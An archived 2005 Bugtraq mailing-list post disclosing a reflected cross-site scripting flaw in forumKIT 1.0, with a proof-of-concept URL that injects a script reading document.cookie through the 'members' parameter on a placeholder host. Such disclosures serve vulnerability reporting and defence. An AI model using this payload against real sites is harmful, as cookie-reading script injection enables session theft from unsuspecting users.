lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050113111700.12211.qmail@www.securityfocus.com> Date: 13 Jan 2005 11:17:00 -0000 From: tom cruise <the.n3t@...il.com> To: bugtraq@...urityfocus.com Subject: XSS Vulnerability in ForumKIT Vulnerable System : forumKIT 1.0 Description : an XSS is founded in the variable members that have the value 'true' you can exchange it with XSS Code . exploit : http://forum.target.com/f.aspx?members="><script>alert(document.cookie);</script> this exploit is discovered by : neO e-mail : al_modamer@...mail.com